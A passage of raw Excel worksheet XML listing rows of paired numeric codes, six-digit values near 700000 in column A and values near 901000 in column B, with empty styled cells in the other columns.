      <c r="H3868" s="1"/>
    </row>
    <row r="3869" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3869" s="5">
        <v>700652</v>
      </c>
      <c r="B3869" s="3">
        <v>901082</v>
      </c>
      <c r="D3869" s="5"/>
      <c r="E3869" s="3"/>
      <c r="F3869" s="1"/>
      <c r="H3869" s="1"/>
    </row>
    <row r="3870" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3870" s="5">
        <v>700652</v>
      </c>
      <c r="B3870" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D3870" s="5"/>
      <c r="E3870" s="3"/>
      <c r="F3870" s="1"/>
      <c r="H3870" s="1"/>
    </row>
    <row r="3871" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3871" s="5">
        <v>700652</v>
      </c>
      <c r="B3871" s="3">
        <v>901033</v>
      </c>
      <c r="D3871" s="5"/>
      <c r="E3871" s="3"/>
      <c r="F3871" s="1"/>
      <c r="H3871" s="1"/>
    </row>
    <row r="3872" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3872" s="5">
        <v>700167</v>
      </c>
      <c r="B3872" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D3872" s="5"/>
      <c r="E3872" s="3"/>
      <c r="F3872" s="1"/>
      <c r="H3872" s="1"/>
    </row>
    <row r="3873" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3873" s="5">
        <v>700167</v>
      </c>
      <c r="B3873" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3873" s="5"/>
      <c r="E3873" s="3"/>
      <c r="F3873" s="1"/>
      <c r="H3873" s="1"/>
    </row>
    <row r="3874" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3874" s="5">
        <v>700167</v>
      </c>
      <c r="B3874" s="3">
        <v>901059</v>
      </c>
      <c r="D3874" s="5"/>
      <c r="E3874" s="3"/>
      <c r="F3874" s="1"/>
      <c r="H3874" s="1"/>
    </row>
    <row r="3875" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3875" s="5">
        <v>700167</v>
      </c>
      <c r="B3875" s="3">
        <v>901555</v>
      </c>
      <c r="D3875" s="5"/>
      <c r="E3875" s="3"/>
      <c r="F3875" s="1"/>
      <c r="H3875" s="1"/>
    </row>
    <row r="3876" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3876" s="5">
        <v>700167</v>
      </c>
      <c r="B3876" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3876" s="5"/>
      <c r="E3876" s="3"/>
      <c r="F3876" s="1"/>
      <c r="H3876" s="1"/>
    </row>
    <row r="3877" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3877" s="5">
        <v>700167</v>
      </c>
      <c r="B3877" s="3">
        <v>901027</v>
      </c>
      <c r="D3877" s="5"/>
      <c r="E3877" s="3"/>
      <c r="F3877" s="1"/>
      <c r="H3877" s="1"/>
    </row>
    <row r="3878" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3878" s="5">
        <v>700167</v>
      </c>
      <c r="B3878" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D3878" s="5"/>
      <c r="E3878" s="3"/>
      <c r="F3878" s="1"/>
      <c r="H3878" s="1"/>
    </row>
    <row r="3879" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3879" s="5">
        <v>700167</v>
      </c>
      <c r="B3879" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3879" s="5"/>
      <c r="E3879" s="3"/>
      <c r="F3879" s="1"/>
      <c r="H3879" s="1"/>
    </row>
    <row r="3880" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3880" s="5">
        <v>700167</v>
      </c>
      <c r="B3880" s="3">
        <v>901113</v>
      </c>
      <c r="D3880" s="5"/>
      <c r="E3880" s="3"/>
      <c r="F3880" s="1"/>
      <c r="H3880" s="1"/>
    </row>
    <row r="3881" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3881" s="5">
        <v>700167</v>
      </c>
      <c r="B3881" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D3881" s="5"/>
      <c r="E3881" s="3"/>
      <c r="F3881" s="1"/>
      <c r="H3881" s="1"/>
    </row>
    <row r="3882" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3882" s="5">
        <v>700303</v>
      </c>
      <c r="B3882" s="3">
        <v>901412</v>
      </c>
      <c r="D3882" s="5"/>
      <c r="E3882" s="3"/>
      <c r="F3882" s="1"/>
      <c r="H3882" s="1"/>
    </row>
    <row r="3883" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3883" s="5">
        <v>700303</v>
      </c>
      <c r="B3883" s="3">
        <v>901448</v>
      </c>
      <c r="D3883" s="5"/>
      <c r="E3883" s="3"/>
      <c r="F3883" s="1"/>
      <c r="H3883" s="1"/>
    </row>
    <row r="3884" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3884" s="5">
        <v>700303</v>
      </c>
      <c r="B3884" s="3">
        <v>901476</v>
      </c>
      <c r="D3884" s="5"/>
      <c r="E3884" s="3"/>
      <c r="F3884" s="1"/>
      <c r="H3884" s="1"/>
    </row>
    <row r="3885" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3885" s="5">
        <v>700449</v>
      </c>
      <c r="B3885" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3885" s="5"/>
      <c r="E3885" s="3"/>
      <c r="F3885" s="1"/>
      <c r="H3885" s="1"/>
    </row>
    <row r="3886" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3886" s="5">
        <v>700449</v>
      </c>
      <c r="B3886" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3886" s="5"/>
      <c r="E3886" s="3"/>
      <c r="F3886" s="1"/>
      <c r="H3886" s="1"/>
    </row>
    <row r="3887" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3887" s="5">
        <v>700449</v>
      </c>
      <c r="B3887" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3887" s="5"/>
      <c r="E3887" s="3"/>
      <c r="F3887" s="1"/>
      <c r="H3887" s="1"/>
    </row>
    <row r="3888" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3888" s="5">
        <v>700449</v>
      </c>
      <c r="B3888" s="3">
        <v>901486</v>
      </c>
      <c r="D3888" s="5"/>
      <c r="E3888" s="3"/>
      <c r="F3888" s="1"/>
      <c r="H3888" s="1"/>
    </row>
    <row r="3889" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3889" s="5">
        <v>700449</v>
      </c>
      <c r="B3889" s="3">
        <v>901568</v>
      </c>
      <c r="D3889" s="5"/>
      <c r="E3889" s="3"/>
      <c r="F3889" s="1"/>
      <c r="H3889" s="1"/>
    </row>
    <row r="3890" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3890" s="5">
        <v>700449</v>
      </c>
      <c r="B3890" s="3">
        <v>901564.00600000005</v>
      </c>
      <c r="D3890" s="5"/>
      <c r="E3890" s="3"/>
      <c r="F3890" s="1"/>
      <c r="H3890" s="1"/>
    </row>
    <row r="3891" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3891" s="5">
        <v>700449</v>
      </c>
      <c r="B3891" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D3891" s="5"/>
      <c r="E3891" s="3"/>
      <c r="F3891" s="1"/>
      <c r="H3891" s="1"/>
    </row>
    <row r="3892" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3892" s="5">
        <v>700449</v>
      </c>
      <c r="B3892" s="3">
        <v>901070</v>
      </c>
      <c r="D3892" s="5"/>
      <c r="E3892" s="3"/>
      <c r="F3892" s="1"/>
      <c r="H3892" s="1"/>
    </row>
    <row r="3893" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3893" s="5">
        <v>700449</v>
      </c>
      <c r="B3893" s="3">
        <v>901490</v>
      </c>
      <c r="D3893" s="5"/>
      <c r="E3893" s="3"/>
      <c r="F3893" s="1"/>
      <c r="H3893" s="1"/>
    </row>
    <row r="3894" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3894" s="5">
        <v>700449</v>
      </c>
      <c r="B3894" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D3894" s="5"/>
      <c r="E3894" s="3"/>
      <c r="F3894" s="1"/>
      <c r="H3894" s="1"/>
    </row>
    <row r="3895" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3895" s="5">
        <v>700449</v>
      </c>
      <c r="B3895" s="3">
        <v>901106</v>
      </c>
      <c r="D3895" s="5"/>
      <c r="E3895" s="3"/>
      <c r="F3895" s="1"/>
      <c r="H3895" s="1"/>
    </row>
    <row r="3896" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3896" s="5">
        <v>700449</v>
      </c>
      <c r="B3896" s="3">
        <v>901027</v>
      </c>
      <c r="D3896" s="5"/>
      <c r="E3896" s="3"/>
      <c r="F3896" s="1"/>
      <c r="H3896" s="1"/>
    </row>
    <row r="3897" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3897" s="5">
        <v>700449</v>
      </c>
      <c r="B3897" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D3897" s="5"/>
      <c r="E3897" s="3"/>
      <c r="F3897" s="1"/>
      <c r="H3897" s="1"/>
    </row>
    <row r="3898" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3898" s="5">
        <v>700449</v>
      </c>
      <c r="B3898" s="3">
        <v>901057</v>
      </c>
      <c r="D3898" s="5"/>
      <c r="E3898" s="3"/>
      <c r="F3898" s="1"/>
      <c r="H3898" s="1"/>
    </row>
    <row r="3899" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3899" s="5">
        <v>700449</v>
      </c>
      <c r="B3899" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D3899" s="5"/>
      <c r="E3899" s="3"/>
      <c r="F3899" s="1"/>
      <c r="H3899" s="1"/>
    </row>
    <row r="3900" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3900" s="5">
        <v>700449</v>
      </c>
      <c r="B3900" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3900" s="5"/>
      <c r="E3900" s="3"/>
      <c r="F3900" s="1"/>
      <c r="H3900" s="1"/>
    </row>
    <row r="3901" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3901" s="5">
        <v>700449</v>
      </c>
      <c r="B3901" s="3">
        <v>901489</v>
      </c>
      <c r="D3901" s="5"/>
      <c r="E3901" s="3"/>
      <c r="F3901" s="1"/>
      <c r="H3901" s="1"/>
    </row>
    <row r="3902" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3902" s="5">
        <v>700449</v>
      </c>
      <c r="B3902" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D3902" s="5"/>
      <c r="E3902" s="3"/>
      <c r="F3902" s="1"/>
      <c r="H3902" s="1"/>
    </row>
    <row r="3903" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3903" s="5">
        <v>700449</v>
      </c>
      <c r="B3903" s="3">
        <v>901082</v>
      </c>
      <c r="D3903" s="5"/>
      <c r="E3903" s="3"/>
      <c r="F3903" s="1"/>
      <c r="H3903" s="1"/>
    </row>
    <row r="3904" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3904" s="5">
        <v>700449</v>
      </c>
      <c r="B3904" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D3904" s="5"/>
      <c r="E3904" s="3"/>
      <c r="F3904" s="1"/>
      <c r="H3904" s="1"/>
    </row>
    <row r="3905" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3905" s="5">
        <v>700449</v>
      </c>
      <c r="B3905" s="3">
        <v>901049</v>
      </c>
      <c r="D3905" s="5"/>
      <c r="E3905" s="3"/>
      <c r="F3905" s="1"/>
      <c r="H3905" s="1"/>
    </row>
    <row r="3906" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3906" s="5">
        <v>700449</v>
      </c>
      <c r="B3906" s="3">
        <v>901529</v>
      </c>
      <c r="D3906" s="5"/>
      <c r="E3906" s="3"/>
      <c r="F3906" s="1"/>
      <c r="H3906" s="1"/>
    </row>
    <row r="3907" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3907" s="5">
        <v>700449</v>
      </c>
      <c r="B3907" s="3">
        <v>901047</v>
      </c>
      <c r="D3907" s="5"/>
      <c r="E3907" s="3"/>
      <c r="F3907" s="1"/>
      <c r="H3907" s="1"/>
    </row>
    <row r="3908" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3908" s="5">
        <v>700500</v>
      </c>
      <c r="B3908" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3908" s="5"/>
      <c r="E3908" s="3"/>
      <c r="F3908" s="1"/>
      <c r="H3908" s="1"/>
    </row>
    <row r="3909" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3909" s="5">
        <v>700500</v>
      </c>
      <c r="B3909" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3909" s="5"/>
      <c r="E3909" s="3"/>
      <c r="F3909" s="1"/>
      <c r="H3909" s="1"/>
    </row>
    <row r="3910" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3910" s="5">
        <v>700500</v>
      </c>
      <c r="B3910" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3910" s="5"/>
      <c r="E3910" s="3"/>
      <c r="F3910" s="1"/>
      <c r="H3910" s="1"/>
    </row>
    <row r="3911" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3911" s="5">
        <v>700500</v>
      </c>
      <c r="B3911" s="3">
        <v>901005</v>
      </c>
      <c r="D3911" s="5"/>
      <c r="E3911" s="3"/>
      <c r="F3911" s="1"/>
      <c r="H3911" s="1"/>
    </row>
    <row r="3912" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3912" s="5">
        <v>700500</v>
      </c>
      <c r="B3912" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="D3912" s="5"/>
      <c r="E3912" s="3"/>
      <c r="F3912" s="1"/>
      <c r="H3912" s="1"/>
    </row>
    <row r="3913" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3913" s="5">
        <v>700500</v>
      </c>
      <c r="B3913" s="3">
        <v>901070</v>
      </c>
      <c r="D3913" s="5"/>
      <c r="E3913" s="3"/>
      <c r="F3913" s="1"/>
      <c r="H3913" s="1"/>
    </row>
    <row r="3914" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3914" s="5">
        <v>700500</v>
      </c>
      <c r="B3914" s="3">
        <v>901105</v>
      </c>
      <c r="D3914" s="5"/>
      <c r="E3914" s="3"/>
      <c r="F3914" s="1"/>
      <c r="H3914" s="1"/>
    </row>
    <row r="3915" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3915" s="5">
        <v>700500</v>
      </c>
      <c r="B3915" s="3">
        <v>901036.005</v>
      </c>
      <c r="D3915" s="5"/>
      <c r="E3915" s="3"/>
      <c r="F3915" s="1"/>
      <c r="H3915" s="1"/>
    </row>
    <row r="3916" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3916" s="5">
        <v>700500</v>
      </c>
      <c r="B3916" s="3">
        <v>901027</v>
      </c>
      <c r="D3916" s="5"/>
      <c r="E3916" s="3"/>
      <c r="F3916" s="1"/>
      <c r="H3916" s="1"/>
    </row>
    <row r="3917" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3917" s="5">
        <v>700500</v>
      </c>
      <c r="B3917" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3917" s="5"/>
      <c r="E3917" s="3"/>
      <c r="F3917" s="1"/>
      <c r="H3917" s="1"/>
    </row>
    <row r="3918" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3918" s="5">
        <v>700459</v>
      </c>
      <c r="B3918" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3918" s="5"/>
      <c r="E3918" s="3"/>
      <c r="F3918" s="1"/>
      <c r="H3918" s="1"/>
    </row>
    <row r="3919" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3919" s="5">
        <v>700459</v>
      </c>
      <c r="B3919" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3919" s="5"/>
      <c r="E3919" s="3"/>
      <c r="F3919" s="1"/>
      <c r="H3919" s="1"/>
    </row>
    <row r="3920" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3920" s="5">
        <v>700459</v>
      </c>
      <c r="B3920" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D3920" s="5"/>
      <c r="E3920" s="3"/>
      <c r="F3920" s="1"/>
      <c r="H3920" s="1"/>
    </row>
    <row r="3921" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3921" s="5">
        <v>700459</v>
      </c>
      <c r="B3921" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D3921" s="5"/>
      <c r="E3921" s="3"/>
      <c r="F3921" s="1"/>
      <c r="H3921" s="1"/>
    </row>
    <row r="3922" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3922" s="5">
        <v>700459</v>
      </c>
      <c r="B3922" s="3">
        <v>901041</v>
      </c>
      <c r="D3922" s="5"/>
      <c r="E3922" s="3"/>
      <c r="F3922" s="1"/>
      <c r="H3922" s="1"/>
    </row>
    <row r="3923" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3923" s="5">
        <v>700459</v>
      </c>
      <c r="B3923" s="3">
        <v>901105</v>
      </c>
      <c r="D3923" s="5"/>
      <c r="E3923" s="3"/>
      <c r="F3923" s="1"/>
      <c r="H3923" s="1"/>
    </row>
    <row r="3924" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3924" s="5">
        <v>700459</v>
      </c>
      <c r="B3924" s="3">
        <v>901036.005</v>
      </c>
      <c r="D3924" s="5"/>
      <c r="E3924" s="3"/>
      <c r="F3924" s="1"/>
      <c r="H3924" s="1"/>
    </row>
    <row r="3925" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3925" s="5">
        <v>700459</v>
      </c>
      <c r="B3925" s="3">
        <v>901033</v>
      </c>
      <c r="D3925" s="5"/>
      <c r="E3925" s="3"/>
      <c r="F3925" s="1"/>
      <c r="H3925" s="1"/>
    </row>
    <row r="3926" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3926" s="5">
        <v>700175</v>
      </c>
      <c r="B3926" s="3">
        <v>901090.00399999996</v>
      </c>
      <c r="D3926" s="5"/>
      <c r="E3926" s="3"/>
      <c r="F3926" s="1"/>
      <c r="H3926" s="1"/>
    </row>
    <row r="3927" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3927" s="5">
        <v>700576</v>
      </c>
      <c r="B3927" s="3">
        <v>901134</v>
      </c>
      <c r="D3927" s="5"/>
      <c r="E3927" s="3"/>
      <c r="F3927" s="1"/>
      <c r="H3927" s="1"/>
    </row>
    <row r="3928" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3928" s="5">
        <v>700576</v>
      </c>
      <c r="B3928" s="3">
        <v>901531</v>
      </c>
      <c r="D3928" s="5"/>
      <c r="E3928" s="3"/>
      <c r="F3928" s="1"/>
      <c r="H3928" s="1"/>
    </row>
    <row r="3929" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3929" s="5">
        <v>700576</v>
      </c>
      <c r="B3929" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3929" s="5"/>
      <c r="E3929" s="3"/>
      <c r="F3929" s="1"/>
      <c r="H3929" s="1"/>
    </row>
    <row r="3930" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3930" s="5">
        <v>700576</v>
      </c>
      <c r="B3930" s="3">
        <v>901486</v>
      </c>
      <c r="D3930" s="5"/>
      <c r="E3930" s="3"/>
      <c r="F3930" s="1"/>
      <c r="H3930" s="1"/>
    </row>
    <row r="3931" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3931" s="5">
        <v>700576</v>
      </c>
      <c r="B3931" s="3">
        <v>901140</v>
      </c>
      <c r="D3931" s="5"/>
      <c r="E3931" s="3"/>
      <c r="F3931" s="1"/>
      <c r="H3931" s="1"/>
    </row>
    <row r="3932" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3932" s="5">
        <v>700576</v>
      </c>
      <c r="B3932" s="3">
        <v>901561.00100000005</v>
      </c>
      <c r="D3932" s="5"/>
      <c r="E3932" s="3"/>
      <c r="F3932" s="1"/>
      <c r="H3932" s="1"/>
    </row>
    <row r="3933" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3933" s="5">
        <v>700576</v>
      </c>
      <c r="B3933" s="3">
        <v>901083</v>
      </c>
      <c r="D3933" s="5"/>
      <c r="E3933" s="3"/>
      <c r="F3933" s="1"/>
      <c r="H3933" s="1"/>
    </row>
    <row r="3934" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3934" s="5">
        <v>700576</v>
      </c>
      <c r="B3934" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D3934" s="5"/>
      <c r="E3934" s="3"/>
      <c r="F3934" s="1"/>
      <c r="H3934" s="1"/>
    </row>
    <row r="3935" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3935" s="5">
        <v>700576</v>
      </c>
      <c r="B3935" s="3">
        <v>901490</v>
      </c>
      <c r="D3935" s="5"/>
      <c r="E3935" s="3"/>
      <c r="F3935" s="1"/>
      <c r="H3935" s="1"/>
    </row>
    <row r="3936" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3936" s="5">
        <v>700576</v>
      </c>
      <c r="B3936" s="3">
        <v>901112</v>
      </c>
      <c r="D3936" s="5"/>
      <c r="E3936" s="3"/>
      <c r="F3936" s="1"/>
      <c r="H3936" s="1"/>
    </row>
    <row r="3937" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3937" s="5">
        <v>700576</v>
      </c>
      <c r="B3937" s="3">
        <v>901106</v>
      </c>
      <c r="D3937" s="5"/>
      <c r="E3937" s="3"/>
      <c r="F3937" s="1"/>
      <c r="H3937" s="1"/>
    </row>
    <row r="3938" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3938" s="5">
        <v>700576</v>
      </c>
      <c r="B3938" s="3">
        <v>901588.00300000003</v>
      </c>
      <c r="D3938" s="5"/>
      <c r="E3938" s="3"/>
      <c r="F3938" s="1"/>
      <c r="H3938" s="1"/>
    </row>
    <row r="3939" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3939" s="5">
        <v>700576</v>
      </c>
      <c r="B3939" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D3939" s="5"/>
      <c r="E3939" s="3"/>
      <c r="F3939" s="1"/>
      <c r="H3939" s="1"/>
    </row>
    <row r="3940" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3940" s="5">
        <v>700576</v>
      </c>
      <c r="B3940" s="3">
        <v>901489</v>
      </c>
      <c r="D3940" s="5"/>
      <c r="E3940" s="3"/>
      <c r="F3940" s="1"/>
      <c r="H3940" s="1"/>
    </row>
    <row r="3941" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3941" s="5">
        <v>700576</v>
      </c>
      <c r="B3941" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D3941" s="5"/>
      <c r="E3941" s="3"/>
      <c r="F3941" s="1"/>
      <c r="H3941" s="1"/>
    </row>
    <row r="3942" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3942" s="5">
        <v>700576</v>
      </c>
      <c r="B3942" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D3942" s="5"/>
      <c r="E3942" s="3"/>
      <c r="F3942" s="1"/>
      <c r="H3942" s="1"/>
    </row>
    <row r="3943" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3943" s="5">
        <v>700530</v>
      </c>
      <c r="B3943" s="3">
        <v>901185</v>
      </c>
      <c r="D3943" s="5"/>
      <c r="E3943" s="3"/>
      <c r="F3943" s="1"/>
      <c r="H3943" s="1"/>
    </row>
    <row r="3944" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3944" s="5">
        <v>700530</v>
      </c>
      <c r="B3944" s="3">
        <v>901115</v>
      </c>
      <c r="D3944" s="5"/>
      <c r="E3944" s="3"/>
      <c r="F3944" s="1"/>
      <c r="H3944" s="1"/>
    </row>
    <row r="3945" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3945" s="5">
        <v>700530</v>
      </c>
      <c r="B3945" s="3">
        <v>901059</v>
      </c>
      <c r="D3945" s="5"/>
      <c r="E3945" s="3"/>
      <c r="F3945" s="1"/>
      <c r="H3945" s="1"/>
    </row>
    <row r="3946" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3946" s="5">
        <v>700530</v>
      </c>
      <c r="B3946" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3946" s="5"/>
      <c r="E3946" s="3"/>
      <c r="F3946" s="1"/>
      <c r="H3946" s="1"/>
    </row>
    <row r="3947" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3947" s="5">
        <v>700530</v>
      </c>
      <c r="B3947" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D3947" s="5"/>
      <c r="E3947" s="3"/>
      <c r="F3947" s="1"/>
      <c r="H3947" s="1"/>
    </row>
    <row r="3948" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3948" s="5">
        <v>700530</v>
      </c>
      <c r="B3948" s="3">
        <v>901565.00199999998</v>
      </c>
      <c r="D3948" s="5"/>
      <c r="E3948" s="3"/>
      <c r="F3948" s="1"/>
      <c r="H3948" s="1"/>
    </row>
    <row r="3949" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3949" s="5">
        <v>700530</v>
      </c>
      <c r="B3949" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D3949" s="5"/>
      <c r="E3949" s="3"/>
      <c r="F3949" s="1"/>
      <c r="H3949" s="1"/>
    </row>
    <row r="3950" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3950" s="5">
        <v>700530</v>
      </c>
      <c r="B3950" s="3">
        <v>901105</v>
      </c>
      <c r="D3950" s="5"/>
      <c r="E3950" s="3"/>
      <c r="F3950" s="1"/>
      <c r="H3950" s="1"/>
    </row>
    <row r="3951" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3951" s="5">
        <v>700530</v>
      </c>
      <c r="B3951" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D3951" s="5"/>
      <c r="E3951" s="3"/>
      <c r="F3951" s="1"/>
      <c r="H3951" s="1"/>
    </row>
    <row r="3952" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3952" s="5">
        <v>700530</v>
      </c>
      <c r="B3952" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D3952" s="5"/>
      <c r="E3952" s="3"/>
      <c r="F3952" s="1"/>
      <c r="H3952" s="1"/>
    </row>
    <row r="3953" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3953" s="5">
        <v>700530</v>
      </c>
      <c r="B3953" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D3953" s="5"/>
      <c r="E3953" s="3"/>
      <c r="F3953" s="1"/>
      <c r="H3953" s="1"/>
    </row>
    <row r="3954" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3954" s="5">
        <v>700530</v>
      </c>
      <c r="B3954" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D3954" s="5"/>
      <c r="E3954" s="3"/>
      <c r="F3954" s="1"/>
      <c r="H3954" s="1"/>
    </row>
    <row r="3955" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3955" s="5">
        <v>700443</v>
      </c>
      <c r="B3955" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D3955" s="5"/>
      <c r="E3955" s="3"/>
      <c r="F3955" s="1"/>
      <c r="H3955" s="1"/>
    </row>
    <row r="3956" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3956" s="5">
        <v>700443</v>
      </c>
      <c r="B3956" s="3">
        <v>901119</v>
      </c>
      <c r="D3956" s="5"/>
      <c r="E3956" s="3"/>
      <c r="F3956" s="1"/>
      <c r="H3956" s="1"/>
    </row>
    <row r="3957" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3957" s="5">
        <v>700443</v>
      </c>
      <c r="B3957" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D3957" s="5"/>
      <c r="E3957" s="3"/>
      <c r="F3957" s="1"/>
      <c r="H3957" s="1"/>
    </row>
    <row r="3958" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3958" s="5">
        <v>700443</v>
      </c>
      <c r="B3958" s="3">
        <v>901140</v>
      </c>
      <c r="D3958" s="5"/>
      <c r="E3958" s="3"/>
      <c r="F3958" s="1"/>
      <c r="H3958" s="1"/>
    </row>
    <row r="3959" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3959" s="5">
        <v>700443</v>
      </c>
      <c r="B3959" s="3">
        <v>901083</v>
      </c>
      <c r="D3959" s="5"/>
      <c r="E3959" s="3"/>
      <c r="F3959" s="1"/>
      <c r="H3959" s="1"/>
    </row>
    <row r="3960" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3960" s="5">
        <v>700443</v>
      </c>
      <c r="B3960" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3960" s="5"/>
      <c r="E3960" s="3"/>
      <c r="F3960" s="1"/>
      <c r="H3960" s="1"/>
    </row>
    <row r="3961" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3961" s="5">
        <v>700443</v>
      </c>
      <c r="B3961" s="3">
        <v>901071</v>
      </c>
      <c r="D3961" s="5"/>
      <c r="E3961" s="3"/>
      <c r="F3961" s="1"/>
      <c r="H3961" s="1"/>
    </row>
    <row r="3962" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3962" s="5">
        <v>700443</v>
      </c>
